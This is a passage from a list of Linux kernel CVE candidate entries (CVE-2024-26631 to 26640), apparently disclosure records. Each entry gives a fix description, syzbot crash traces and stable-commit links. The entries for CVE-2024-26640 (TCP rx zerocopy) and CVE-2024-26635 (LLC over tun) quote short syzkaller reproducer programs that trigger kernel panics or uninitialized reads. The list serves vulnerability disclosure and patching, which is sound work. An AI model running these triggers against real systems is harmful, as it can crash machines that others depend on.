tun_get_user+0x1e8a/0x66d0 drivers/net/tun.c:1846 tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2048 call_write_iter include/linux/fs.h:2084 [inline] new_sync_write fs/read_write.c:497 [inline] vfs_write+0x786/0x1200 fs/read_write.c:590 ksys_write+0x20f/0x4c0 fs/read_write.c:643 __do_sys_write fs/read_write.c:655 [inline] __se_sys_write fs/read_write.c:652 [inline] __x64_sys_write+0x93/0xd0 fs/read_write.c:652 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0x6d/0x140 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b CPU: 0 PID: 5034 Comm: syz-executor331 Not tainted 6.7.0-syzkaller-00562-g9f8413c4a66f #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023 MISC:https://git.kernel.org/stable/c/350a6640fac4b53564ec20aa3f4a0922cb0ba5e6 | URL:https://git.kernel.org/stable/c/350a6640fac4b53564ec20aa3f4a0922cb0ba5e6 | MISC:https://git.kernel.org/stable/c/8d975c15c0cd744000ca386247432d57b21f9df0 | URL:https://git.kernel.org/stable/c/8d975c15c0cd744000ca386247432d57b21f9df0 | MISC:https://git.kernel.org/stable/c/a9bc32879a08f23cdb80a48c738017e39aea1080 | URL:https://git.kernel.org/stable/c/a9bc32879a08f23cdb80a48c738017e39aea1080 | MISC:https://git.kernel.org/stable/c/af6b5c50d47ab43e5272ad61935d0ed2e264d3f0 | URL:https://git.kernel.org/stable/c/af6b5c50d47ab43e5272ad61935d0ed2e264d3f0 | MISC:https://git.kernel.org/stable/c/c835df3bcc14858ae9b27315dd7de76370b94f3a | URL:https://git.kernel.org/stable/c/c835df3bcc14858ae9b27315dd7de76370b94f3a | MISC:https://git.kernel.org/stable/c/d54e4da98bbfa8c257bdca94c49652d81d18a4d8 | URL:https://git.kernel.org/stable/c/d54e4da98bbfa8c257bdca94c49652d81d18a4d8 Assigned (20240219)
CVE 2024 26640 Candidate In the Linux kernel, the following vulnerability has been resolved: tcp: add sanity checks to rx zerocopy TCP rx zerocopy intent is to map pages initially allocated from NIC drivers, not pages owned by a fs. This patch adds to can_map_frag() these additional checks: - Page must not be a compound one. - page->mapping must be NULL. This fixes the panic reported by ZhangPeng. syzbot was able to loopback packets built with sendfile(), mapping pages owned by an ext4 file to TCP rx zerocopy. r3 = socket$inet_tcp(0x2, 0x1, 0x0) mmap(&(0x7f0000ff9000/0x4000)=nil, 0x4000, 0x0, 0x12, r3, 0x0) r4 = socket$inet_tcp(0x2, 0x1, 0x0) bind$inet(r4, &(0x7f0000000000)={0x2, 0x4e24, @multicast1}, 0x10) connect$inet(r4, &(0x7f00000006c0)={0x2, 0x4e24, @empty}, 0x10) r5 = openat$dir(0xffffffffffffff9c, &(0x7f00000000c0)='./file0\x00', 0x181e42, 0x0) fallocate(r5, 0x0, 0x0, 0x85b8) sendfile(r4, r5, 0x0, 0x8ba0) getsockopt$inet_tcp_TCP_ZEROCOPY_RECEIVE(r4, 0x6, 0x23, &(0x7f00000001c0)={&(0x7f0000ffb000/0x3000)=nil, 0x3000, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0}, &(0x7f0000000440)=0x40) r6 = openat$dir(0xffffffffffffff9c, &(0x7f00000000c0)='./file0\x00', 0x181e42, 0x0) MISC:https://git.kernel.org/stable/c/1b8adcc0e2c584fec778add7777fe28e20781e60 | URL:https://git.kernel.org/stable/c/1b8adcc0e2c584fec778add7777fe28e20781e60 | MISC:https://git.kernel.org/stable/c/577e4432f3ac810049cb7e6b71f4d96ec7c6e894 | URL:https://git.kernel.org/stable/c/577e4432f3ac810049cb7e6b71f4d96ec7c6e894 | MISC:https://git.kernel.org/stable/c/718f446e60316bf606946f7f42367d691d21541e | URL:https://git.kernel.org/stable/c/718f446e60316bf606946f7f42367d691d21541e | MISC:https://git.kernel.org/stable/c/b383d4ea272fe5795877506dcce5aad1f6330e5e | URL:https://git.kernel.org/stable/c/b383d4ea272fe5795877506dcce5aad1f6330e5e | MISC:https://git.kernel.org/stable/c/d15cc0f66884ef2bed28c7ccbb11c102aa3a0760 | URL:https://git.kernel.org/stable/c/d15cc0f66884ef2bed28c7ccbb11c102aa3a0760 | MISC:https://git.kernel.org/stable/c/f48bf9a83b1666d934247cb58a9887d7b3127b6f | URL:https://git.kernel.org/stable/c/f48bf9a83b1666d934247cb58a9887d7b3127b6f Assigned (20240219)
CVE 2024 26639 Candidate In the Linux kernel, the following vulnerability has been resolved: mm, kmsan: fix infinite recursion due to RCU critical section Alexander Potapenko writes in [1]: "For every memory access in the code instrumented by KMSAN we call kmsan_get_metadata() to obtain the metadata for the memory being accessed. For virtual memory the metadata pointers are stored in the corresponding `struct page`, therefore we need to call virt_to_page() to get them. According to the comment in arch/x86/include/asm/page.h, virt_to_page(kaddr) returns a valid pointer iff virt_addr_valid(kaddr) is true, so KMSAN needs to call virt_addr_valid() as well. To avoid recursion, kmsan_get_metadata() must not call instrumented code, therefore ./arch/x86/include/asm/kmsan.h forks parts of arch/x86/mm/physaddr.c to check whether a virtual address is valid or not. But the introduction of rcu_read_lock() to pfn_valid() added instrumented RCU API calls to virt_to_page_or_null(), which is called by kmsan_get_metadata(), so there is an infinite recursion now. I do not think it is correct to stop that recursion by doing kmsan_enter_runtime()/kmsan_exit_runtime() in kmsan_get_metadata(): that would prevent instrumented functions called from within the runtime from tracking the shadow values, which might introduce false positives." Fix the issue by switching pfn_valid() to the _sched() variant of rcu_read_lock/unlock(), which does not require calling into RCU. Given the critical section in pfn_valid() is very small, this is a reasonable trade-off (with preemptible RCU). KMSAN further needs to be careful to suppress calls into the scheduler, which would be another source of recursion. This can be done by wrapping the call to pfn_valid() into preempt_disable/enable_no_resched(). The downside is that this sacrifices breaking scheduling guarantees; however, a kernel compiled with KMSAN has already given up any performance guarantees due to being heavily instrumented. Note, KMSAN code already disables tracing via Makefile, and since mmzone.h is included, it is not necessary to use the notrace variant, which is generally preferred in all other cases. MISC:https://git.kernel.org/stable/c/5a33420599fa0288792537e6872fd19cc8607ea6 | URL:https://git.kernel.org/stable/c/5a33420599fa0288792537e6872fd19cc8607ea6 | MISC:https://git.kernel.org/stable/c/6335c0cdb2ea0ea02c999e04d34fd84f69fb27ff | URL:https://git.kernel.org/stable/c/6335c0cdb2ea0ea02c999e04d34fd84f69fb27ff | MISC:https://git.kernel.org/stable/c/dc904345e3771aa01d0b8358b550802fdc6fe00b | URL:https://git.kernel.org/stable/c/dc904345e3771aa01d0b8358b550802fdc6fe00b Assigned (20240219)
CVE 2024 26638 Candidate In the Linux kernel, the following vulnerability has been resolved: nbd: always initialize struct msghdr completely syzbot complains that msg->msg_get_inq value can be uninitialized [1] struct msghdr got many new fields recently, we should always make sure their values is zero by default. [1] BUG: KMSAN: uninit-value in tcp_recvmsg+0x686/0xac0 net/ipv4/tcp.c:2571 tcp_recvmsg+0x686/0xac0 net/ipv4/tcp.c:2571 inet_recvmsg+0x131/0x580 net/ipv4/af_inet.c:879 sock_recvmsg_nosec net/socket.c:1044 [inline] sock_recvmsg+0x12b/0x1e0 net/socket.c:1066 __sock_xmit+0x236/0x5c0 drivers/block/nbd.c:538 nbd_read_reply drivers/block/nbd.c:732 [inline] recv_work+0x262/0x3100 drivers/block/nbd.c:863 process_one_work kernel/workqueue.c:2627 [inline] process_scheduled_works+0x104e/0x1e70 kernel/workqueue.c:2700 worker_thread+0xf45/0x1490 kernel/workqueue.c:2781 kthread+0x3ed/0x540 kernel/kthread.c:388 ret_from_fork+0x66/0x80 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:242 Local variable msg created at: __sock_xmit+0x4c/0x5c0 drivers/block/nbd.c:513 nbd_read_reply drivers/block/nbd.c:732 [inline] recv_work+0x262/0x3100 drivers/block/nbd.c:863 CPU: 1 PID: 7465 Comm: kworker/u5:1 Not tainted 6.7.0-rc7-syzkaller-00041-gf016f7547aee #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023 Workqueue: nbd5-recv recv_work MISC:https://git.kernel.org/stable/c/1960f2b534da1e6c65fb96f9e98bda773495f406 | URL:https://git.kernel.org/stable/c/1960f2b534da1e6c65fb96f9e98bda773495f406 | MISC:https://git.kernel.org/stable/c/78fbb92af27d0982634116c7a31065f24d092826 | URL:https://git.kernel.org/stable/c/78fbb92af27d0982634116c7a31065f24d092826 | MISC:https://git.kernel.org/stable/c/b0028f333420a65a53a63978522db680b37379dd | URL:https://git.kernel.org/stable/c/b0028f333420a65a53a63978522db680b37379dd | MISC:https://git.kernel.org/stable/c/d9c54763e5cdbbd3f81868597fe8aca3c96e6387 | URL:https://git.kernel.org/stable/c/d9c54763e5cdbbd3f81868597fe8aca3c96e6387 Assigned (20240219)
CVE 2024 26637 Candidate In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: rely on mac80211 debugfs handling for vif mac80211 started to delete debugfs entries in certain cases, causing a ath11k to crash when it tried to delete the entries later. Fix this by relying on mac80211 to delete the entries when appropriate and adding them from the vif_add_debugfs handler. MISC:https://git.kernel.org/stable/c/556857aa1d0855aba02b1c63bc52b91ec63fc2cc | URL:https://git.kernel.org/stable/c/556857aa1d0855aba02b1c63bc52b91ec63fc2cc | MISC:https://git.kernel.org/stable/c/aa74ce30a8a40d19a4256de4ae5322e71344a274 | URL:https://git.kernel.org/stable/c/aa74ce30a8a40d19a4256de4ae5322e71344a274 Assigned (20240219)
CVE 2024 26636 Candidate In the Linux kernel, the following vulnerability has been resolved: llc: make llc_ui_sendmsg() more robust against bonding changes syzbot was able to trick llc_ui_sendmsg(), allocating an skb with no headroom, but subsequently trying to push 14 bytes of Ethernet header [1] Like some others, llc_ui_sendmsg() releases the socket lock before calling sock_alloc_send_skb(). Then it acquires it again, but does not redo all the sanity checks that were performed. This fix: - Uses LL_RESERVED_SPACE() to reserve space. - Check all conditions again after socket lock is held again. - Do not account Ethernet header for mtu limitation. [1] skbuff: skb_under_panic: text:ffff800088baa334 len:1514 put:14 head:ffff0000c9c37000 data:ffff0000c9c36ff2 tail:0x5dc end:0x6c0 dev:bond0 kernel BUG at net/core/skbuff.c:193 ! Internal error: Oops - BUG: 00000000f2000800 [#1] PREEMPT SMP Modules linked in: CPU: 0 PID: 6875 Comm: syz-executor.0 Not tainted 6.7.0-rc8-syzkaller-00101-g0802e17d9aca-dirty #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023 pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : skb_panic net/core/skbuff.c:189 [inline] pc : skb_under_panic+0x13c/0x140 net/core/skbuff.c:203 lr : skb_panic net/core/skbuff.c:189 [inline] lr : skb_under_panic+0x13c/0x140 net/core/skbuff.c:203 sp : ffff800096f97000 x29: ffff800096f97010 x28: ffff80008cc8d668 x27: dfff800000000000 x26: ffff0000cb970c90 x25: 00000000000005dc x24: ffff0000c9c36ff2 x23: ffff0000c9c37000 x22: 00000000000005ea x21: 00000000000006c0 x20: 000000000000000e x19: ffff800088baa334 x18: 1fffe000368261ce x17: ffff80008e4ed000 x16: ffff80008a8310f8 x15: 0000000000000001 x14: 1ffff00012df2d58 x13: 0000000000000000 x12: 0000000000000000 x11: 0000000000000001 x10: 0000000000ff0100 x9 : e28a51f1087e8400 x8 : e28a51f1087e8400 x7 : ffff80008028f8d0 x6 : 0000000000000000 x5 : 0000000000000001 x4 : 0000000000000001 x3 : ffff800082b78714 x2 : 0000000000000001 x1 : 0000000100000000 x0 : 0000000000000089 Call trace: skb_panic net/core/skbuff.c:189 [inline] skb_under_panic+0x13c/0x140 net/core/skbuff.c:203 skb_push+0xf0/0x108 net/core/skbuff.c:2451 eth_header+0x44/0x1f8 net/ethernet/eth.c:83 dev_hard_header include/linux/netdevice.h:3188 [inline] llc_mac_hdr_init+0x110/0x17c net/llc/llc_output.c:33 llc_sap_action_send_xid_c+0x170/0x344 net/llc/llc_s_ac.c:85 llc_exec_sap_trans_actions net/llc/llc_sap.c:153 [inline] llc_sap_next_state net/llc/llc_sap.c:182 [inline] llc_sap_state_process+0x1ec/0x774 net/llc/llc_sap.c:209 llc_build_and_send_xid_pkt+0x12c/0x1c0 net/llc/llc_sap.c:270 llc_ui_sendmsg+0x7bc/0xb1c net/llc/af_llc.c:997 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg net/socket.c:745 [inline] sock_sendmsg+0x194/0x274 net/socket.c:767 splice_to_socket+0x7cc/0xd58 fs/splice.c:881 do_splice_from fs/splice.c:933 [inline] direct_splice_actor+0xe4/0x1c0 fs/splice.c:1142 splice_direct_to_actor+0x2a0/0x7e4 fs/splice.c:1088 do_splice_direct+0x20c/0x348 fs/splice.c:1194 do_sendfile+0x4bc/0xc70 fs/read_write.c:1254 __do_sys_sendfile64 fs/read_write.c:1322 [inline] __se_sys_sendfile64 fs/read_write.c:1308 [inline] __arm64_sys_sendfile64+0x160/0x3b4 fs/read_write.c:1308 __invoke_syscall arch/arm64/kernel/syscall.c:37 [inline] invoke_syscall+0x98/0x2b8 arch/arm64/kernel/syscall.c:51 el0_svc_common+0x130/0x23c arch/arm64/kernel/syscall.c:136 do_el0_svc+0x48/0x58 arch/arm64/kernel/syscall.c:155 el0_svc+0x54/0x158 arch/arm64/kernel/entry-common.c:678 el0t_64_sync_handler+0x84/0xfc arch/arm64/kernel/entry-common.c:696 el0t_64_sync+0x190/0x194 arch/arm64/kernel/entry.S:595 Code: aa1803e6 aa1903e7 a90023f5 94792f6a (d4210000) MISC:https://git.kernel.org/stable/c/04f2a74b562f3a7498be0399309669f342793d8c | URL:https://git.kernel.org/stable/c/04f2a74b562f3a7498be0399309669f342793d8c | MISC:https://git.kernel.org/stable/c/6d53b813ff8b177f86f149c2f744442681f720e4 | URL:https://git.kernel.org/stable/c/6d53b813ff8b177f86f149c2f744442681f720e4 | MISC:https://git.kernel.org/stable/c/84e9d10419f6f4f3f3cd8f9aaf44a48719aa4b1b | URL:https://git.kernel.org/stable/c/84e9d10419f6f4f3f3cd8f9aaf44a48719aa4b1b | MISC:https://git.kernel.org/stable/c/b643d0defcbacd7fe548bc65c3e4e6f17dc5eb2d | URL:https://git.kernel.org/stable/c/b643d0defcbacd7fe548bc65c3e4e6f17dc5eb2d | MISC:https://git.kernel.org/stable/c/c22044270da68881074fda81a7d34812726cb249 | URL:https://git.kernel.org/stable/c/c22044270da68881074fda81a7d34812726cb249 | MISC:https://git.kernel.org/stable/c/c451c008f563d56d5e676c9dcafae565fcad84bb | URL:https://git.kernel.org/stable/c/c451c008f563d56d5e676c9dcafae565fcad84bb | MISC:https://git.kernel.org/stable/c/cafd3ad3fe03ef4d6632747be9ee15dc0029db4b | URL:https://git.kernel.org/stable/c/cafd3ad3fe03ef4d6632747be9ee15dc0029db4b | MISC:https://git.kernel.org/stable/c/dad555c816a50c6a6a8a86be1f9177673918c647 | URL:https://git.kernel.org/stable/c/dad555c816a50c6a6a8a86be1f9177673918c647 Assigned (20240219)
CVE 2024 26635 Candidate In the Linux kernel, the following vulnerability has been resolved: llc: Drop support for ETH_P_TR_802_2. syzbot reported an uninit-value bug below. [0] llc supports ETH_P_802_2 (0x0004) and used to support ETH_P_TR_802_2 (0x0011), and syzbot abused the latter to trigger the bug. write$tun(r0, &(0x7f0000000040)={@val={0x0, 0x11}, @val, @mpls={[], @llc={@snap={0xaa, 0x1, ')', "90e5dd"}}}}, 0x16) llc_conn_handler() initialises local variables {saddr,daddr}.mac based on skb in llc_pdu_decode_sa()/llc_pdu_decode_da() and passes them to __llc_lookup(). However, the initialisation is done only when skb->protocol is htons(ETH_P_802_2), otherwise, __llc_lookup_established() and __llc_lookup_listener() will read garbage. The missing initialisation existed prior to commit 211ed865108e ("net: delete all instances of special processing for token ring"). It removed the part to kick out the token ring stuff but forgot to close the door allowing ETH_P_TR_802_2 packets to sneak into llc_rcv(). Let's remove llc_tr_packet_type and complete the deprecation. [0]: BUG: KMSAN: uninit-value in __llc_lookup_established+0xe9d/0xf90 __llc_lookup_established+0xe9d/0xf90 __llc_lookup net/llc/llc_conn.c:611 [inline] llc_conn_handler+0x4bd/0x1360 net/llc/llc_conn.c:791 llc_rcv+0xfbb/0x14a0 net/llc/llc_input.c:206 __netif_receive_skb_one_core net/core/dev.c:5527 [inline] __netif_receive_skb+0x1a6/0x5a0 net/core/dev.c:5641 netif_receive_skb_internal net/core/dev.c:5727 [inline] netif_receive_skb+0x58/0x660 net/core/dev.c:5786 tun_rx_batched+0x3ee/0x980 drivers/net/tun.c:1555 tun_get_user+0x53af/0x66d0 drivers/net/tun.c:2002 tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2048 call_write_iter include/linux/fs.h:2020 [inline] new_sync_write fs/read_write.c:491 [inline] vfs_write+0x8ef/0x1490 fs/read_write.c:584 ksys_write+0x20f/0x4c0 fs/read_write.c:637 __do_sys_write fs/read_write.c:649 [inline] __se_sys_write fs/read_write.c:646 [inline] __x64_sys_write+0x93/0xd0 fs/read_write.c:646 do_syscall_x64 arch/x86/entry/common.c:51 [inline] do_syscall_64+0x44/0x110 arch/x86/entry/common.c:82 entry_SYSCALL_64_after_hwframe+0x63/0x6b Local variable daddr created at: llc_conn_handler+0x53/0x1360 net/llc/llc_conn.c:783 llc_rcv+0xfbb/0x14a0 net/llc/llc_input.c:206 CPU: 1 PID: 5004 Comm: syz-executor994 Not tainted 6.6.0-syzkaller-14500-g1c41041124bd #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/09/2023 MISC:https://git.kernel.org/stable/c/165ad1e22779685c3ed3dd349c6c4c632309cc62 | URL:https://git.kernel.org/stable/c/165ad1e22779685c3ed3dd349c6c4c632309cc62 | MISC:https://git.kernel.org/stable/c/660c3053d992b68fee893a0e9ec9159228cffdc6 | URL:https://git.kernel.org/stable/c/660c3053d992b68fee893a0e9ec9159228cffdc6 | MISC:https://git.kernel.org/stable/c/9ccdef19cf9497c2803b005369668feb91cacdfd | URL:https://git.kernel.org/stable/c/9ccdef19cf9497c2803b005369668feb91cacdfd | MISC:https://git.kernel.org/stable/c/b8e8838f82f332ae80c643dbb1ca4418d0628097 | URL:https://git.kernel.org/stable/c/b8e8838f82f332ae80c643dbb1ca4418d0628097 | MISC:https://git.kernel.org/stable/c/c0fe2fe7a5a291dfcf6dc64301732c8d3dc6a828 | URL:https://git.kernel.org/stable/c/c0fe2fe7a5a291dfcf6dc64301732c8d3dc6a828 | MISC:https://git.kernel.org/stable/c/df57fc2f2abf548aa889a36ab0bdcc94a75399dc | URL:https://git.kernel.org/stable/c/df57fc2f2abf548aa889a36ab0bdcc94a75399dc | MISC:https://git.kernel.org/stable/c/e3f9bed9bee261e3347131764e42aeedf1ffea61 | URL:https://git.kernel.org/stable/c/e3f9bed9bee261e3347131764e42aeedf1ffea61 | MISC:https://git.kernel.org/stable/c/f1f34a515fb1e25e85dee94f781e7869ae351fb8 | URL:https://git.kernel.org/stable/c/f1f34a515fb1e25e85dee94f781e7869ae351fb8 Assigned (20240219)
CVE 2024 26634 Candidate In the Linux kernel, the following vulnerability has been resolved: net: fix removing a namespace with conflicting altnames Mark reports a BUG() when a net namespace is removed. kernel BUG at net/core/dev.c:11520! Physical interfaces moved outside of init_net get "refunded" to init_net when that namespace disappears. The main interface name may get overwritten in the process if it would have conflicted. We need to also discard all conflicting altnames. Recent fixes addressed ensuring that altnames get moved with the main interface, which surfaced this problem. MISC:https://git.kernel.org/stable/c/8072699aa9e67d1727692cfb3c347263bb627fb9 | URL:https://git.kernel.org/stable/c/8072699aa9e67d1727692cfb3c347263bb627fb9 | MISC:https://git.kernel.org/stable/c/a2232f29bf52c24f827865b3c90829c44b6c695b | URL:https://git.kernel.org/stable/c/a2232f29bf52c24f827865b3c90829c44b6c695b | MISC:https://git.kernel.org/stable/c/d09486a04f5da0a812c26217213b89a3b1acf836 | URL:https://git.kernel.org/stable/c/d09486a04f5da0a812c26217213b89a3b1acf836 | MISC:https://git.kernel.org/stable/c/e855dded4b70d1975ee7b9fed0c700391e3c8ea6 | URL:https://git.kernel.org/stable/c/e855dded4b70d1975ee7b9fed0c700391e3c8ea6 Assigned (20240219)
CVE 2024 26633 Candidate In the Linux kernel, the following vulnerability has been resolved: ip6_tunnel: fix NEXTHDR_FRAGMENT handling in ip6_tnl_parse_tlv_enc_lim() syzbot pointed out [1] that NEXTHDR_FRAGMENT handling is broken. Reading frag_off can only be done if we pulled enough bytes to skb->head. Currently we might access garbage. [1] BUG: KMSAN: uninit-value in ip6_tnl_parse_tlv_enc_lim+0x94f/0xbb0 ip6_tnl_parse_tlv_enc_lim+0x94f/0xbb0 ipxip6_tnl_xmit net/ipv6/ip6_tunnel.c:1326 [inline] ip6_tnl_start_xmit+0xab2/0x1a70 net/ipv6/ip6_tunnel.c:1432 __netdev_start_xmit include/linux/netdevice.h:4940 [inline] netdev_start_xmit include/linux/netdevice.h:4954 [inline] xmit_one net/core/dev.c:3548 [inline] dev_hard_start_xmit+0x247/0xa10 net/core/dev.c:3564 __dev_queue_xmit+0x33b8/0x5130 net/core/dev.c:4349 dev_queue_xmit include/linux/netdevice.h:3134 [inline] neigh_connected_output+0x569/0x660 net/core/neighbour.c:1592 neigh_output include/net/neighbour.h:542 [inline] ip6_finish_output2+0x23a9/0x2b30 net/ipv6/ip6_output.c:137 ip6_finish_output+0x855/0x12b0 net/ipv6/ip6_output.c:222 NF_HOOK_COND include/linux/netfilter.h:303 [inline] ip6_output+0x323/0x610 net/ipv6/ip6_output.c:243 dst_output include/net/dst.h:451 [inline] ip6_local_out+0xe9/0x140 net/ipv6/output_core.c:155 ip6_send_skb net/ipv6/ip6_output.c:1952 [inline] ip6_push_pending_frames+0x1f9/0x560 net/ipv6/ip6_output.c:1972 rawv6_push_pending_frames+0xbe8/0xdf0 net/ipv6/raw.c:582 rawv6_sendmsg+0x2b66/0x2e70 net/ipv6/raw.c:920 inet_sendmsg+0x105/0x190 net/ipv4/af_inet.c:847 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg net/socket.c:745 [inline] ____sys_sendmsg+0x9c2/0xd60 net/socket.c:2584 ___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638 __sys_sendmsg net/socket.c:2667 [inline] __do_sys_sendmsg net/socket.c:2676 [inline] __se_sys_sendmsg net/socket.c:2674 [inline] __x64_sys_sendmsg+0x307/0x490 net/socket.c:2674 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0x44/0x110 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b Uninit was created at: slab_post_alloc_hook+0x129/0xa70 mm/slab.h:768 slab_alloc_node mm/slub.c:3478 [inline] __kmem_cache_alloc_node+0x5c9/0x970 mm/slub.c:3517 __do_kmalloc_node mm/slab_common.c:1006 [inline] __kmalloc_node_track_caller+0x118/0x3c0 mm/slab_common.c:1027 kmalloc_reserve+0x249/0x4a0 net/core/skbuff.c:582 pskb_expand_head+0x226/0x1a00 net/core/skbuff.c:2098 __pskb_pull_tail+0x13b/0x2310 net/core/skbuff.c:2655 pskb_may_pull_reason include/linux/skbuff.h:2673 [inline] pskb_may_pull include/linux/skbuff.h:2681 [inline] ip6_tnl_parse_tlv_enc_lim+0x901/0xbb0 net/ipv6/ip6_tunnel.c:408 ipxip6_tnl_xmit net/ipv6/ip6_tunnel.c:1326 [inline] ip6_tnl_start_xmit+0xab2/0x1a70 net/ipv6/ip6_tunnel.c:1432 __netdev_start_xmit include/linux/netdevice.h:4940 [inline] netdev_start_xmit include/linux/netdevice.h:4954 [inline] xmit_one net/core/dev.c:3548 [inline] dev_hard_start_xmit+0x247/0xa10 net/core/dev.c:3564 __dev_queue_xmit+0x33b8/0x5130 net/core/dev.c:4349 dev_queue_xmit include/linux/netdevice.h:3134 [inline] neigh_connected_output+0x569/0x660 net/core/neighbour.c:1592 neigh_output include/net/neighbour.h:542 [inline] ip6_finish_output2+0x23a9/0x2b30 net/ipv6/ip6_output.c:137 ip6_finish_output+0x855/0x12b0 net/ipv6/ip6_output.c:222 NF_HOOK_COND include/linux/netfilter.h:303 [inline] ip6_output+0x323/0x610 net/ipv6/ip6_output.c:243 dst_output include/net/dst.h:451 [inline] ip6_local_out+0xe9/0x140 net/ipv6/output_core.c:155 ip6_send_skb net/ipv6/ip6_output.c:1952 [inline] ip6_push_pending_frames+0x1f9/0x560 net/ipv6/ip6_output.c:1972 rawv6_push_pending_frames+0xbe8/0xdf0 net/ipv6/raw.c:582 rawv6_sendmsg+0x2b66/0x2e70 net/ipv6/raw.c:920 inet_sendmsg+0x105/0x190 net/ipv4/af_inet.c:847 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg net/socket.c:745 [inline] ____sys_sendmsg+0x9c2/0xd60 net/socket.c:2584 ___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638 __sys_sendmsg net/socket.c:2667 [inline] __do_sys_sendms ---truncated--- MISC:https://git.kernel.org/stable/c/135414f300c5db995e2a2f3bf0f455de9d014aee | URL:https://git.kernel.org/stable/c/135414f300c5db995e2a2f3bf0f455de9d014aee | MISC:https://git.kernel.org/stable/c/3f15ba3dc14e6ee002ea01b4faddc3d49200377c | URL:https://git.kernel.org/stable/c/3f15ba3dc14e6ee002ea01b4faddc3d49200377c | MISC:https://git.kernel.org/stable/c/4329426cf6b8e22b798db2331c7ef1dd2a9c748d | URL:https://git.kernel.org/stable/c/4329426cf6b8e22b798db2331c7ef1dd2a9c748d | MISC:https://git.kernel.org/stable/c/62a1fedeb14c7ac0947ef33fadbabd35ed2400a2 | URL:https://git.kernel.org/stable/c/62a1fedeb14c7ac0947ef33fadbabd35ed2400a2 | MISC:https://git.kernel.org/stable/c/687c5d52fe53e602e76826dbd4d7af412747e183 | URL:https://git.kernel.org/stable/c/687c5d52fe53e602e76826dbd4d7af412747e183 | MISC:https://git.kernel.org/stable/c/ba8d904c274268b18ef3dc11d3ca7b24a96cb087 | URL:https://git.kernel.org/stable/c/ba8d904c274268b18ef3dc11d3ca7b24a96cb087 | MISC:https://git.kernel.org/stable/c/d375b98e0248980681e5e56b712026174d617198 | URL:https://git.kernel.org/stable/c/d375b98e0248980681e5e56b712026174d617198 | MISC:https://git.kernel.org/stable/c/da23bd709b46168f7dfc36055801011222b076cd | URL:https://git.kernel.org/stable/c/da23bd709b46168f7dfc36055801011222b076cd Assigned (20240219)
CVE 2024 26632 Candidate In the Linux kernel, the following vulnerability has been resolved: block: Fix iterating over an empty bio with bio_for_each_folio_all If the bio contains no data, bio_first_folio() calls page_folio() on a NULL pointer and oopses. Move the test that we've reached the end of the bio from bio_next_folio() to bio_first_folio(). [axboe: add unlikely() to error case] MISC:https://git.kernel.org/stable/c/7bed6f3d08b7af27b7015da8dc3acf2b9c1f21d7 | URL:https://git.kernel.org/stable/c/7bed6f3d08b7af27b7015da8dc3acf2b9c1f21d7 | MISC:https://git.kernel.org/stable/c/a6bd8182137a12d22d3f2cee463271bdcb491659 | URL:https://git.kernel.org/stable/c/a6bd8182137a12d22d3f2cee463271bdcb491659 | MISC:https://git.kernel.org/stable/c/c6350b5cb78e9024c49eaee6fdb914ad2903a5fe | URL:https://git.kernel.org/stable/c/c6350b5cb78e9024c49eaee6fdb914ad2903a5fe | MISC:https://git.kernel.org/stable/c/ca3ede3f5893e2d26d4dbdef1eec28a8487fafde | URL:https://git.kernel.org/stable/c/ca3ede3f5893e2d26d4dbdef1eec28a8487fafde Assigned (20240219)
CVE 2024 26631 Candidate In the Linux kernel, the following vulnerability has been resolved: ipv6: mcast: fix data-race in ipv6_mc_down / mld_ifc_work idev->mc_ifc_count can be written over without proper locking. Originally found by syzbot [1], fix this issue by encapsulating calls to mld_ifc_stop_work() (and mld_gq_stop_work() for good measure) with mutex_lock() and mutex_unlock() accordingly as these functions should only be called with mc_lock per their declarations. [1] BUG: KCSAN: data-race in ipv6_mc_down / mld_ifc_work write to 0xffff88813a80c832 of 1 bytes by task 3771 on cpu 0: mld_ifc_stop_work net/ipv6/mcast.c:1080 [inline] ipv6_mc_down+0x10a/0x280 net/ipv6/mcast.c:2725 addrconf_ifdown+0xe32/0xf10 net/ipv6/addrconf.c:3949 addrconf_notify+0x310/0x980 notifier_call_chain kernel/notifier.c:93 [inline] raw_notifier_call_chain+0x6b/0x1c0 kernel/notifier.c:461 __dev_notify_flags+0x205/0x3d0 dev_change_flags+0xab/0xd0 net/core/dev.c:8685 do_setlink+0x9f6/0x2430 net/core/rtnetlink.c:2916 rtnl_group_changelink net/core/rtnetlink.c:3458 [inline] __rtnl_newlink net/core/rtnetlink.c:3717 [inline] rtnl_newlink+0xbb3/0x1670 net/core/rtnetlink.c:3754 rtnetlink_rcv_msg+0x807/0x8c0 net/core/rtnetlink.c:6558 netlink_rcv_skb+0x126/0x220 net/netlink/af_netlink.c:2545 rtnetlink_rcv+0x1c/0x20 net/core/rtnetlink.c:6576 netlink_unicast_kernel net/netlink/af_netlink.c:1342 [inline] netlink_unicast+0x589/0x650 net/netlink/af_netlink.c:1368 netlink_sendmsg+0x66e/0x770 net/netlink/af_netlink.c:1910 ... write to 0xffff88813a80c832 of 1 bytes by task 22 on cpu 1: mld_ifc_work+0x54c/0x7b0 net/ipv6/mcast.c:2653 process_one_work kernel/workqueue.c:2627 [inline] process_scheduled_works+0x5b8/0xa30 kernel/workqueue.c:2700 worker_thread+0x525/0x730 kernel/workqueue.c:2781 ... MISC:https://git.kernel.org/stable/c/2e7ef287f07c74985f1bf2858bedc62bd9ebf155 | URL:https://git.kernel.org/stable/c/2e7ef287f07c74985f1bf2858bedc62bd9ebf155 